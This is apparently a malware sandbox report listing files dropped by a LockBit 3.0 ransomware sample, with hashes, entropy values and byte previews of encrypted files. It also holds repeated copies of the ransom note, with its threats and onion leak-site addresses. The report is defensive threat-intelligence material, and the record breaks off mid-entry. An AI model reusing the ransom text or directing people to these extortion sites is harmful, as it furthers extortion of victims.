                Preview:^r.y.L..}..\.}>6(8.....(.xz.<9..G.,.Xa....j...,..r.!.7.V.a..c..x....C<...Ol..........W..x..L{J.&.g)...u.t(.<.v.M.MV....H.......@.~FS.l....,....MAq...@....6"R..D..-..7..yto..x...ch.1.U.[....b....*.v..x.l...O2b...../2NSh.6Q..W.}...T._.u.]9.........E"x.y...'...K..JY....kb...<.mp.....K.K.......*Zw...|[..X+.A0p\G"...[..?..#..B.J.......R.~W@.......L>r.Ji..L.+...~iG.?..].W@.Rr.....B.DG...D.K.&........q,Y.H..rZ.......h.z...C...R.I.}?cy...\Aj........z...W.......!....A...<.$.....N....y.'...uz\...dx.s..;..q..S../E%..c.....H{...[....=u.G....CW6.w..f..B....z....-.W.rC..J.3r........&,.B....`.L..9...H.b}d.......1(.p.6.j...........v..f.O=u...T$.)..<..3.*N...s.G..T.I../m..8...X.+JIaP.B..nRg....z..-?.a86.;.g..Z....#4.:.....t.A..gn.............q.`............&.lh.&._.5.A.a....r.I.J.....u..-.r.k.....j..*.....#.X..1..xe....j..........?g1/.*u0..>.S.E.......l...w.e....^..P.ml.6+G.....ls.<YX9....Z?..k..a..#..J....4..q......NO..........s.7g.JVp...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4541
                Entropy (8bit):7.955863480623205
                Encrypted:false
                SSDEEP:96:0dmgeXdS5RlOzeKsIOpKIbKayOhaiEFgfnDE7h30gTO664gUTZvdhu9W2HslQaJo:0dmpoAzeLZKIEut5+t6PUTZTOAo
                MD5:F71B2E90683AB47FA8A9E74E23D0944E
                SHA1:20CBAD1888968F7E71E32404A9A613819FE399C6
                SHA-256:82CE3FB789A1822308258971287D2303EFCA08F3D0AE4002F620900113859B11
                SHA-512:17EF009E5D7C2A72314FA32040F64742228F57CB0C0C55C64320BABEF4F33A7BD2DB426C30D2DB67852E9D08D447F2683A5345BAF565CE34CE48159FE068C4E5
                Malicious:false
                Preview:..N.T........Wv.H.C..R.......Z.z..Xs.Y...W..{3.x./...m.....5.....gF.:&.`..-.<...1...G....C.Tv9.$._.B..U.-.X......xv.,Z..fB].*.p]:.U..LX..S...Z{....A......q..D.p.%..N....o..-..-==...g...1.....S.D(;.#.W.....!.(.0z...$...V......NI...&....."......]..E.......C._?e...9%~..=~.....q.....O..8.....(,W.vsGG....,...d..j..f.+98..&...i.....?..NU.X.. a.."....d.wh8..1...v.U.dXI..1......~_...-...^9......+..).....k^..A...N.....y..|.)O!...\.[.....1.h..)]...?.@(.dL.........../.l..?.`.+e...n...v..c-...O....\^.f.....G......&..p.Ys..S......3.#...X9.. ..s.. .....^.......j......Q ..V..`=.Q!6z.`y..I...8.EW...5.(....E.k.h..q.....T..y."....72...]..gy........!~...Gb.,%72..T....|....Ye.F.N......-t.e...\q..d..o...<.;.W.E!...j.~qo\r.VeR..c.........^.{.V*.mh.E......caj....E2%..`.sE?......BY[@...K.$8...Ii...%1..".PW..#...jU.l...D.......q...vm6...#.aD%..>.Wn..O.UJ.9[.=fS ..m.G.q...)./.O.0q.........?!.7...\..".tE=..tr.+w.|.7S.-f..w..!..H..7!o.........D..#X.C...1.u.=.M.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):20515
                Entropy (8bit):7.9922115242629355
                Encrypted:true
                SSDEEP:384:XQPGlgZAeyhS9QWMCzev8IVqQPHRua9x7KfgQcAmA5KMvSwq:XQPf1YS9t88IVHX7KfHcAmPMvXq
                MD5:33B423B9F9D64D4E8503B6AFA123B7FA
                SHA1:9D735D5212C90C47953F1EBEC101A36641022131
                SHA-256:578E25BF69EC3ECB8E8F4506DDA466DD35A31DD967723EE41C5E716B03AA5DE8
                SHA-512:4513565F605A1845CC120BA6C5238ADE8CA269105A317D702369A13AAB38D678B56F86E3C974F27448A1DAD4A910D71140E629C83AD547C0962B509056A0FB19
                Malicious:true
                Preview:.T.V.d.O.u...2#1!.;*.&.r(#jd......$'.:.~...r...R}......B...?T.....=r....I..~.lKq9!55......U...D5..&u.8...S.j.U.*...j[..N..S...>)..P.8.$.....vb...0$.....A..N.*P@...*/..o...i.B............S.._..3@:.....)..*<x..b...6.....=..]..O]...8`..uz.~!.;...'..c.~..YR...l....}.G.@....8....|b...b..t...-..F5.+.b."..G../...A..../..5Y.Q.1...;......?..v.;.e.. ._L...a.h....V..#n........G...... ...1.j..d'..n.3..9....a)o..:F.#.7z.G1'.......D'.".r4..9@C.Z.5%...6.o...,H.....kI.v...n.z.F.c.v....{qb.X;Hw...!.....P.fz.!Y'KD%..Gq....1.2.J.zN,.^.....A.|B.aC...fg........".....B5.d8.6.^.n...K.U..............l....3....n..i.J..}...3...V.xh...Jn).jR?.4.F_.s.c....gK.1..b\......3..o9....dP.@..1K.A.\..#..k`..Fmb.e...g....q.T?..04s.......R...;`}N..-%+.F.....1^.P.3.c/P.}.rQ....5L37X..._...G....AZ*..#\.?...k....u..F<....KO.J..A..-:.Xx....o ..&M..R..vV.....Q=D.T.L|..IMd..2......S.c.....{.^.$fO.71B.T.Xd.L@.D. .N"<.......!C....QW.l..X.[....BB...h..v.-{>@@..0....f.SY..6.Z.........

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\0.1.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.162926731033811
                Encrypted:false
                SSDEEP:6:ZpAF9YCKXq3lCY/3NC6ud9/mW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:ZpcOUl55ud5D2VJNAWnM+i+9BVzd
                MD5:50A27F05F78CBC0C4B27AC92E933844A
                SHA1:22C2DC9A97B97E451CFA13612638C2EF5AFD25AE
                SHA-256:4D7FA6FDBF52522759AE38B9F255C549D012E42FDD7FAD2772C268B844A86E6F
                SHA-512:9DAE941B5B838846B6E243FE62E58F437B528673207EADB86F2E5D095537DFCD4C13765B215E165A2904C124A161391FE1ECF802BBA02DEFE60D74C93C1BB6B2
                Malicious:false
                Preview:.G..=.^q.!..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"w.+(...=..>sIwD!.j.K.]./.B....i..z.=.Y..U..pvI..Bx.o..x....}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\0.2.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.218438178124923
                Encrypted:false
                SSDEEP:6:Ejg9YCKXq33j22/szPPRLBrTt0HmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:EjgOU3j220DrTaHD2VJNAWnM+i+9BVzd
                MD5:74755EF96C3A4443EB5B198E257ECEF6
                SHA1:45066B903AB81916826AF6AEA25DA299080983AA
                SHA-256:2CA18107D5A254D7E3394E2F66E040443E38E14CB9F3B628923A7B4D87879C36
                SHA-512:C58EBB73BE12602F0179E23B780B4C7368C49FDD082CCC999F652C3014A3D2C56C3CE74A72C85350497AD0347A80563ED7C0C97C3A73C38D2FE3D0CDEB46398F
                Malicious:false
                Preview:a.6.^.^q."..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik":..(.NRU.k..9...y.+....R<.>.@...j..6K&..a..6.sx.-..>...kH..|.}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\Apps.ft.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):27386
                Entropy (8bit):7.992552329086863
                Encrypted:true
                SSDEEP:768:SDChqEqk9RiJNWBTk5gwRaGfOBG7Z5kKh9b54j3LMNDgQ:SDChq6fU8BZGfMMZ2KhlUaX
                MD5:31FA17DE4CF5479A5A7099E6607C491F
                SHA1:3320AC376086B73FA834D55C350E30A27D849AD2
                SHA-256:61484D0E524D9F3583B8634298537646F9CFF74C6A426688FE9FC47E1AED93BC
                SHA-512:C6CA031A76232DEE4ED9CF2004CC0A0602A80E5EA96800CF6F6C537007930F9BF68B18E44E9D07531635D47B7692007D22C509424B7BCCCB722AB184925D5DC7
                Malicious:true
                Preview:..7k.a...xF.n..&/.....0...|..-..u..M.) u%......?0..S..6.ke..3G.M.J,.cB ....C. .....E..r..N....U....?.f.wM.x.B.5.(.......-.I\_.'..1S&...C....T.....N......3..@9.....Q..Xa.......alb..e..[sU.%>....(..b....K...5o....^...=.I.....v.%.R....q...t....^...S..h..MD........xEU.#,o.'.(..8..ZnZ......],..aKH.m..`. .7Hko......PY".@..g..Se..Pw.1......`........S.Iu.......9...J.H...&....)2....s.. ...,LEV..V.kh....b.|0.....U-.........LlTSw*/.e.t(q9....n<6.%.XK:..f....x<}gPk..&X9{.\]..l..>QR.."...iI.`Cy......|..{......Of...Dx;.bfn`_....%.y..d/OS.|...C....!.\..V..5\..."...?.s.L...N......Y.R.t.QA+.....7..\...}....}\\.].......G!%...<.U77~......r+...s....v.m.NF.8.C...4.-..z]..X.....uq.d.:.w..3....4......j.{..4.,}.........t..A...Cm..[GQ...}..:....x>kX.R....z..s.<.s4...|F.!/..4...(.07S..#k..p..z..n.K.O./.@.b...a..B5._Z(r.?.c......j.2.0........z.|.vJQ.Z+R..$..`.l..\............;7..j...p..Z{.5.$.\...W[...k.?....#?.md..e..z.......A...k.V!......3w....gq...1.A8...#.5

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\Apps.index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):146286
                Entropy (8bit):7.998685423760083
                Encrypted:true
                SSDEEP:3072:NozjWxaRgtc6JGF6jjKZX/dfUTTy2DXXtX80VUP31OYzL7Emt:Mqtc2jKzfSTyAXXtX3WQ+L9
                MD5:8167E9DBC79AA39512BFC844CDEBCFAE
                SHA1:A4D96372A9C69ACB10096A8F6DCEF4DF363ED2A5
                SHA-256:8C20FE2B6F1FF02EA32C433413B49E63E36160D17BA5612B60AFBD16317B1F8D
                SHA-512:110CA67EC7FB11FACA1DEB91FCE7F9A91DE81C0B60D51ED0824252049E7B9BDAA7D96046E4D0BCF7A1FE4FB08D0E2AEB9530605713D92E10542DE11B683FC9CC
                Malicious:true
                Preview:......rf......S .<.m]MR..$.....a..3.mY......>..f4.\z..,.....MqQ.....R@..=...0+.u.G< /._..=.b....D.U...}'..W.|..|/ ./...:.J=..~....p..).......n..S.YrmE...ey]8.E...2..>+E..<./u.<..)z'..{&..h.4x.\(.(.......,.`...y.p.Je..H%X.t....km....d._H.......S....y.......V.D...;5~.....c...%.Q..>.........e9...[.H.e.......)&4Y.-h.GS..N^s.d..<8..i..s-.t6.-Adb.....l..b.l.U.F.!...g..T.d...l.M.y...k_.{......#........WK.K.x...%`..7.tE*y.....#...4N^..j....-.l...j~:NC..!..........x...eI^y>Z.NlgJ..N..Tq..r.|.rc..R....4.w..j..:+x..S.Jyn......{....i..,.4...?5.n.I.{KQ.B ..a....y.....n.._r..2....,..#...)...fQV..W].EC......~.....c...|.0......_z.9.R.....X..p.T.`.k.&.....O~y..cQ'Z|.?.g.}...u.=>.Z.9?G.J|T.w.....\..Ps.Ps.8..Z6...zvS......EJsh..|.n.F.0...0......t.a....b6n....^.......L.......>:.Y.....q3..j?.i.)T.......^..*$..3.... ...(..9..[^...J....._..........E.`zm@..b}@.H...e.Y.b.N.x.Vj!......^`&.u.8..x.$o.|..%)L...a..J.....yr..P.1.l.z.8...D..F..'..}.L/.o.....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):20515
                Entropy (8bit):7.992522982851288
                Encrypted:true
                SSDEEP:384:I9fEfhtNap18iEdcwxKuEnE3PlZvr5klggq7bEeuuzxqOBdbMUCdNZL:4ca18i8wnE/ldr4M3ltqOBOZL
                MD5:AF4224C0293FE365409ED140E696F128
                SHA1:A8181284E2A57E16994E27A521D0C0A5FC9A8C35
                SHA-256:AB92C26A40FBC1B2D2B1DECD6A342D6A6A90682E74BF5DCF15109DAC9E1B2D3E
                SHA-512:BB24BD388BE4108FDCDECB893E4689718544098729747FB4B051E5B344D091C9FEA0DEF7A4D4C279CCA04798641B85A3E1CD9DA4607B5B44D1C166CE1080B8FD
                Malicious:true
                Preview:-.....4=..{."..].I.!..n<|`8.i.>.....Y...?.4.odOZ.- .n.U.....`..f.}.,....X.{..7Y.k.#..../.\[I.........o.!.....L.........."...fp..../%..t....k`.gK@h1'..'tdqd/8B..9....s.j..T..q.y......}.YA.*Z2(.V....(.....^..p..j.u....Q^a...j.w|._0j...P..m%k........X.~Yv.E..[.T.......e..g.:... O~.......~.zZ...(NTW.....GS.TM.2\.:/.....aY;...2....;.%.ws.,:j......'.S!.s.t.i...U-f..5..(......d...2.9Q..A.A._|...ukG.....?..L.0.s..VYt..y=NZ.....t...T9._#....mt...3~^..o*]...WMn......}.i^M.".q..n..NM......I". .n..Y....K.5.Q.6.^@..._..7.@.7DA.......i......}..}.7......o.....q*...n....Zi....g.Un.d.U.\...9lR.....:.J.~.%h.%.@;. ..xC...`....(&*.f....E..|....M....K.*U.9...0.@->..V..c..-......F.....a..s...&2Q,.....J...f..(....0..\).O....g....b..EV?!;..;.Dc...2....[..,X2.^..G...Q.. ..1.B.R..........j..C)....v.._....V.+...;..uZZ.x7.. 38...G.k.-...-.Ay'..G..........M.$..;..|.b..o8..b.0p.."..)..u...-O$).! ..>x.&7..Y..X%.i.=..F......Z8.q(...yB.n.G.#..Nj.F..H\P...T..@..E...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\0.1.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.198094202682085
                Encrypted:false
                SSDEEP:6:FF9YCKXq3hUBAy2AoMboY+VmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:rOUhtyoyEVD2VJNAWnM+i+9BVzd
                MD5:3B1B0C8B75DF7C89E4BB757AFBBEBC90
                SHA1:479B507723624F871506E85F0EC25C098B0372A7
                SHA-256:D591F57FFC750423B5BF029DFDCF277D479179AD310F40C8C3AFEF7D160D7552
                SHA-512:51F6F9E83F6A02C75BEFCA0464318A38C43877CCD837C08D666CDF6813F50F967D29EEAED6C3AD2C42D862C51BADE8F8B83C1CD019B16D4EFFDECEC5416838DF
                Malicious:false
                Preview:...?6.^q.!..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"..`..$el..%2Vi*..u:....xiE8......%.o@3.@i....w....\.....3...HV^}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\0.2.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.214100121201717
                Encrypted:false
                SSDEEP:6:lXXg9YCKXq36xlH/aAu1g+jJdTmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:ZgOUslfHuG+jPTD2VJNAWnM+i+9BVzd
                MD5:0CCCF2A66D72C65D58086148C91C8AD0
                SHA1:1453AA6A37317515FB1D9F74C242D6672144C722
                SHA-256:D7B630C54C2C18829AF030EBEF4DF4B96C2E7296651F9A3633DFABE15D41275C
                SHA-512:0A7BA69BA4DF70C7E59D5CAF35BFC3BAEA25860FA4EA586CD4BC0CF56A09B79AE60AE10A7FD1C987335E3C064AF39BD6EAE369E758EAC3931DD2BAB655091137
                Malicious:false
                Preview:......^q."..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"..j...".Q~#.....2i.-Z.......1...y..}m....>...a.B.o5......}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\Apps.ft.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):27386
                Entropy (8bit):7.992800325968964
                Encrypted:true
                SSDEEP:384:5M6q9fQ1RF9FkNNoclAfTFRwcLInEhf9Ti8BIo1f/LJPrpTXO8zq4SS5ZX0ZkX+:ufQLF9FwPsRhLyE/JzLJz9O8WEq
                MD5:9E5FB48D891A006E8EB8B1008FE0D6F0
                SHA1:EC13ABD8059BBF98EBD36F8E1E349C7AE9417567
                SHA-256:2CBEA88699BE9915656C500B68C9E135774429F82554DBD24488B63EE37738EE
                SHA-512:59266420BD51ECBC565FA24E9C7256354383B52E0750949AA57D5F6C509DB35FCF13A971A460B6109366DF504E25AED9F3EE6BFEF56002BADF817772F5CF84FE
                Malicious:true
                Preview:..3&=".Y..m.r.Rk.O.|.Ma...z.T..P_....q.Y..t_..c.....||A....S...D.Kq...br.W.^.>....z......6......2:...-7_.....!.rZ.....O.........\..8..p.._s.....N..F.....%xKq\Q..L....0.C..7...)+8NV..?..F.\..rz5....~1..".!|.;.Nz..........Az~.d.".|Po.i..K...^^<...Z..t...;...k.1T|.u.FR.Y|.t...l..Ss.N$...4@...!S.{.7...>..1M|...#f..6r.q...........8.....f_.. YMT.B.F=..eX..[P.}.....R..(.=t2.V....U?.K..+H...`...f.p>.......fn.n.e.O...Ia.*d../.'W..s...1...|.$^fg.e.9.N..^..vr..]@F..!.s....w.+=......._..t....&..`zq4=dDX...f...|........#....J}m.g.0.........sv.!...{.p.e....(........-..mP....Y.d+....b..-..:.0Vb....^W...."..|...ib.k...Y..9.].6.;pk...G8WI*&.}..o..3...`^...<m...&..zW/`u..z.j .m..z..M.Ws........zh.I-..&W..fZ.<..).h..J...R.l..8..-......y.0..i..u..(....\~.#...|.5...O.T...m6..r.........i{W.1M.9`..g...tj..N.Q...4...#3.2..Zc^.H.^NP..C$>.7x~d.=.>.E2VK....z...........`a2...I`. .z...N[.j.5I]....%eq....m..g..............4. .=.9.`..HJd....{.T.....u....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\Apps.index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):145841
                Entropy (8bit):7.998791600060404
                Encrypted:true
                SSDEEP:3072:7douAS6kNkZ7iiSqglFyzeNhSLZwZNz/X2P8Vf1ubA2soDb/:7ZN6kNkZ7iXlFyzejpZNLX2EWGov/
                MD5:BA064EDBFA8A29AA1A8103BB849236F1
                SHA1:6B8B2429956CC715281939544AE6A14E90C88949
                SHA-256:9469832302B939BA839E52A9C734476491F3ECCE9D2E0D633C4CDB899D5C79B3
                SHA-512:1FB37914A00F1A9DFBC1838E74491705BB707AF0548AF85AE0B02B377C9D6D77C5EAD6E2780F0AAF769ABDC2BBF4DACC8AB9972E0F991B9E46C4909892B1C2F6
                Malicious:true
                Preview:(..X|r=S!M....%3.."_|X(....G3',.*Xf..{.>..|../Mv..N1......z..O......{}..I..8..<...6s.....6..:............_.....'..gDR].=..7.1.>....0.._..n..?3.F.(k..g.. ](.H..'.,5.z.-h..W."x.. W.>.../.. ...I.%u.O%nb..)1...Y...NF...G6......u.H.")....._..k..n.3.[..>...B.".x.1....r..B.P.5.Q.~....."..#......J.iL..PzI....N...h..J#:a..D...0..Z.|.?F%.FEw..O......i*....nn..n..m.KC^..|A...x..h..O...Y.....kU....>....}5.M....S...m.y/..y)j..r)....f....y.P......=bD.0w$....G.2ezv...`.....b].\[6]._..'..=t.,.a.#g.6*Y.~...{2.`.i5.6.?J...~_....;..C?F.4.....f....m...5..M....p...w.s..(..>{6D78.......!.....|...>.......+.....]..V.#.~...t.......[..G.o.fH\.~h.l...x"..bY...t=OM.d.ij.7.....^v9Qbi..!.%.j10...p.iI=.....1..[...>.Ya..C.?..<.C..*.@1.X&.<5.A_+.v.KIa..XH*C.@J....t....k5.5V.MU.fr..5Rw..!.F.....1..,.. ........T.!....Xw....A.<bL....l....=....z...../..[^...... %..s..nR..........v.8...D.#.pqL.....|..H....9U....#..H.....I|A....c.X.}Wp.m...t..$....v.F=..........>.mf4R

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):20515
                Entropy (8bit):7.9913896034469944
                Encrypted:true
                SSDEEP:384:2AZ5sBXE+WlKLzXsRZCKRzuVSlXYpd5uI6924VglsvBDjFBvg6KJsSM9tDG:2AZ5wWgXcRZCSzuVSlX2kr2Egl8RpBva
                MD5:75A69F1DB48583CCACA73E73F6655B0B
                SHA1:D237556B7A98591949B41B32E34F28AC756F0488
